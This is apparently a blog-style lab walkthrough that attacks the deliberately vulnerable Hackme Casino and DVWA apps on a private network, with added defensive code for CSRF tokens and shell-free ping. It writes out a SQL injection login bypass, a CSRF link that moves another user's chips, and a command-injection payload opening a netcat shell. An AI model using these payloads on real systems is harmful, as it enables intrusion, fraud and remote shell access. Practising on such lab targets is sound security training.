web application – application simulators

Web Security Dojo – http://www.mavensecurity.com/web_security_dojo/

1. Download the VM or VirtualBox image. Install it, then click on Applications/Accessories and open Terminal.

Add an IP address

dojo@dojo-vm:~$ sudo ifconfig eth1 192.168.1.2 netmask 255.255.255.0 (press enter)
[sudo] password for dojo: dojo (press enter)
dojo@dojo-vm:~$

Hackme Casino

1. Click on Applications/Targets/Hackme Casino Start (Firefox should start up and will state Offline mode). In the File menu, untick Work Offline, then refresh.

2. Open another VM or VirtualBox machine (I use Backtrack 5R1) and click on Applications/Accessories to open Terminal.

Add an IP address in the same network and check it is working by pinging the dojo IP address.

3. Open a browser in Backtrack and type in http://192.168.1.2:3000. This should open the remote Hackme app.

4. Let the fun begin!

5. Hit it with Nikto, W3af, Metasploit, Nessus, anything you can think of.

As an example of an interesting tool, see www.myexploit.wordpress.com/web-application-owasp_zap/

Zap demo using Hackme Casino

1. Set the Firefox proxy in Backtrack to point to ZAP. In Firefox, go to Edit/Preferences/Advanced/Network/Settings.

Tick Manual proxy configuration, set HTTP Proxy = 127.0.0.1 and Port = 8080, then OK, Close.

2. Start up ZAP with root@bt:/pentest/web/owasp-zap# java -jar zap.jar and then refresh the Firefox browser; you should see 192.168.1.2:3000 under Sites in ZAP.

3. Now that the proxy is working, it's time to log in to Hackme Casino. For the username use the SQL injection below. No password is required, just enter the SQL injection and press enter.

') OR 1=1--

4. Now that we are logged in, let's try Cross-Site Request Forgery to steal some chips. This is a great example. The concept: write a URL string that, once clicked by another user, makes them send you chips without knowing.

For this to work you need another user's account. Log out and log in with the username: bobby_blackjack and the password: twenty_one

5. Go to Options/Transfer chips, type in 0, change the recipient to andy_aces and press enter.

Response = This is not an acceptable value – This is great as an error sign

Now that it is set up, let's use it.

1. In ZAP, open History. Here you will see the attempt to post the 0 chips; below is how the proxy shows it.

POST http://192.168.1.2:3000/account/transfer_chips

The RAW view shows transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

2. From the results in ZAP, create a URL as below, paste it into the browser and resend. (Paste in and press enter)

http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

3. The result shows an interesting error screen (as can be seen below). It has also reformatted the input. (Why? I'm not sure! But yep, it helps!)

Error reads – Unknown action

No action responded to transfer=000000000000000000&login[]=bobby_blackjack&commit=Transfer Chips

Note that in the URL, Transfer+Chips has a + added between Transfer and Chips. So it does not like gaps, ok thanks for this info!

4. So now I try a different string made up from the errors and what I feel may work: http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=andy_aces&commit=Transfer+Chips

No joy, so more trying. This time adding the findings and trying:

http://192.168.1.2:3000/account/transfer_chips/transfer=100&login%5B%5D=andy_aces&commit=Transfer+Chips

5. The result: no error signs, so is it working? Nope, as no chips are moved across. The problem is the use of the / sign at the end of transfer_chips = http://192.168.1.2:3000/account/transfer_chips/

We don't want to go to another directory, we want to execute the command transfer=100&login%5B%5D=andy_aces&commit=Transfer+Chips

So trying to replace / with a ?

http://192.168.1.2:3000/account/transfer_chips?transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

Result: the chips go down, and andy_aces gets a nice gift!

For info: if you write a Cross-Site Request Forgery URL, it can be converted by a free URL redirection service like TinyURL. So be careful opening links!

POST http://192.168.1.2:3000/account/transfer_chips
RAW view transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

From the results above, create a URL as below and paste it into the browser.

http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

The result is an error screen, interesting because it has reformatted the input.
Unknown action

No action responded to transfer=000000000000000000&login[]=bobby_blackjack&commit=Transfer Chips

And the URL changed too:

http://192.168.1.2:3000/account/transfer=000000000000000000&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

This time adding the findings and trying:
http://192.168.1.2:3000/account/transfer_chips/transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips

The result: no error, but no chips are moved across. The problem is the trailing / in http://192.168.1.2:3000/account/transfer_chips/
/ = directory change, but we want to execute the command transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
So trying to replace / with a ?

http://192.168.1.2:3000/account/transfer_chips?transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips
Result: the chips go down. So now if you replaced the username with your own and tricked another logged-in user into clicking on the link, they would send you chips.
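The link works because the application accepts the transfer parameters in the query string of a GET request and asks for nothing that a third party could not supply. The sketch below is an added example, not code from Hackme Casino: it shows the two server-side checks that stop it (POST only for state changes, plus a per-session token). The handle() router, the session dictionary and the authenticity_token field name are assumptions made for the illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# Routes that change state; the path is the one seen in the ZAP history above.
STATE_CHANGING = {"/account/transfer_chips"}


def new_session(user):
    """Server-side session holding a random per-session CSRF token."""
    return {"user": user, "csrf_token": secrets.token_urlsafe(32)}


def handle(method, url, body, session):
    """Return (status, reason); hypothetical stand-in for the application's router."""
    if urlsplit(url).path not in STATE_CHANGING:
        return 404, "unknown action"
    # 1. State changes are POST only, so a clicked or shortened link (a GET) does nothing.
    if method != "POST":
        return 405, "method not allowed"
    # 2. Parameters are read from the body only; the query string is ignored.
    form = parse_qs(body, keep_blank_values=True)
    sent = form.get("authenticity_token", [""])[0]
    # 3. Constant-time comparison with the token stored in the session.
    if not hmac.compare_digest(sent.encode(), session["csrf_token"].encode()):
        return 403, "invalid CSRF token"
    amount = form.get("transfer", [""])[0]
    if not amount.isdecimal() or int(amount) <= 0:
        return 422, "not an acceptable value"
    return 200, "transferred %d chips" % int(amount)


BASE = "http://192.168.1.2:3000/account/transfer_chips"
PARAMS = "transfer=100&login%5B%5D=bobby_blackjack&commit=Transfer+Chips"


def demo():
    s = new_session("bobby_blackjack")
    return [
        handle("GET", BASE + "?" + PARAMS, "", s),   # the link from the walkthrough
        handle("POST", BASE, PARAMS, s),             # cross-site form, no token
        handle("POST", BASE, PARAMS + "&authenticity_token=" + s["csrf_token"], s),
    ]


if __name__ == "__main__":
    for status, reason in demo():
        print(status, reason)
```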

————————————————————-

DVWA

Command Execution

Point the web browser to
ip-address/dvwa/vulnerabilities/exec/

Vulnerability: Command Execution
Ping for FREE

Type into the box
remote-ip-address;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 13371 > /tmp/pipe
(press submit)

Open terminal and type in

root@bt:~# nc remote-ip-address 13371
cd /etc
ls -l
total 1104
drwxr-xr-x 5 root root 4096 Aug 16 2010 ConsoleKit
drwxr-xr-x 5 root root 4096 Jul 3 07:06 NetworkManager
drwxr-xr-x 2 root root 4096 Dec 4 2009 ODBCDataSources
drwxr-xr-x 10 root root 4096 Aug 16 2010 X11
drwxr-xr-x 3 root root 4096 Aug 16 2010 acpi
-rw-r--r-- 1 root root 2981 Aug 16 2010 adduser.conf
drwxr-xr-x 2 root root 12288 Jul 3 07:25 alternatives
-rw-r--r-- 1 root root 395 Mar 4 2010 anacrontab
drwxr-xr-x 7 root root 4096 Jun 29 04:55 apache2
drwxr-xr-x 6 root root 4096 Aug 16 2010 apm
drwxr-xr-x 3 root root 4096 Aug 16 2010 apparmor
drwxr-xr-x 7 root root 4096 Sep 30 2010 apparmor.d
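The ping box accepts a second command after the ; because the input reaches a shell as part of a command line. The following is an added example, not DVWA's own code: it puts that pattern beside a hardened form that validates the input as an IPv4 address and runs ping from an argument list without a shell. The function names and the sample input are constructed for the illustration.

```python
import ipaddress
import subprocess


def vulnerable_command(target):
    """The risky pattern: user input pasted into a shell command line."""
    return "ping -c 3 " + target  # a shell treats ';' and '|' in target as syntax


def safe_ping_argv(target):
    """Return an argv list for ping, or raise ValueError if target is not IPv4."""
    addr = ipaddress.IPv4Address(target.strip())  # anything else raises ValueError
    # The address is a single argv element and is never parsed by a shell.
    return ["ping", "-c", "3", str(addr)]


def ping(target, timeout=10):
    """Run ping without a shell and return its exit code."""
    argv = safe_ping_argv(target)
    done = subprocess.run(argv, shell=False, timeout=timeout,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return done.returncode


# Constructed input with the same shape as the one typed into the box above:
# an address, then ';' and a second command (a harmless echo here).
SAMPLE = "192.168.1.2; echo INJECTED"


def demo():
    results = {"vulnerable": vulnerable_command(SAMPLE)}
    try:
        results["hardened"] = safe_ping_argv(SAMPLE)
    except ValueError as exc:
        results["hardened"] = "rejected: %s" % exc
    results["valid"] = safe_ping_argv("192.168.1.2")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```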
